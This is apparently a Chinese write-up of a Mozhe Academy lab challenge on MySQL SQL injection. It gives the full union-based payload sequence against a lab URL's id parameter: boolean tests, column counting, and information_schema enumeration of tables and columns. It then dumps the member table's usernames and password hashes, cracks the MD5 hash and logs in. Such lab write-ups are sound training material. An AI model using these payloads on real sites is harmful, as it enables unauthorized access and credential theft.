SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)
地址:https://www.mozhe.cn/bug/djdsS0VVb0sxVytXY0NKMXZUeGJ4dz09bW96aGUmozhe?page=3

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第1张图片

解题过程
  1. 寻找可注入网页,原网页尝试任意账密登录后地址栏没有回显,发现点击下图中的通知网页后地址栏信息为

    http://219.153.49.228:47011/new_list.php?id=1 //可能存在注入点
    SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第2张图片

  2. 寻找回显,构造Payload分别进行注入

    ?id=1 and 1=1 –

    ?id=1 and 1=2 –

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第3张图片
SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第4张图片

说明存在注入点;
  1. 查询字段(列)数:字段数为4

    ?id=1 order by 4 –

    or

    ?id=1 order by 5 –

  2. 确认回显位置:2,3 均为回显位

    ?id=-1 union select 1,2,3,4 –

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第5张图片

  1. 查询数据库名以及数据库版本:mozhe_Discuz_StormGroup

    ?id=-1 union select 1,database(),version(),4 –

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第6张图片

  1. 查询数据表:StormGroup_member,notice

    ?id=-1 union select 1,group_concat(table_name),version(),4 from information_schema.tables where table_schema=database() –

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第7张图片

  1. 查询字段:id,name,password,status

    ?id=-1 union select 1,group_concat(column_name),version(),4 from information_schema.columns where table_name=‘StormGroup_member’ and table_schema=database() –

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第8张图片

  1. 查看字段内容:

    ?id=-1 union select 1,group_concat(id,0x3a,name,0x3a,password,0x3a,status),3,4 from StormGroup_member –

在这里插入图片描述

  1. 经查询得到两条数据,观察可得用户名name=‘mozhe’

    status(状态)一个为1,一个为0,考虑为1的密码是正确密码,经md5解密

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第9张图片

  1. 登录原网页,拿到key:

SQL注入【一】墨者学院-SQL注入漏洞测试(MySQL数据库)_第10张图片

你可能感兴趣的:(笔记,sql,mysql,安全)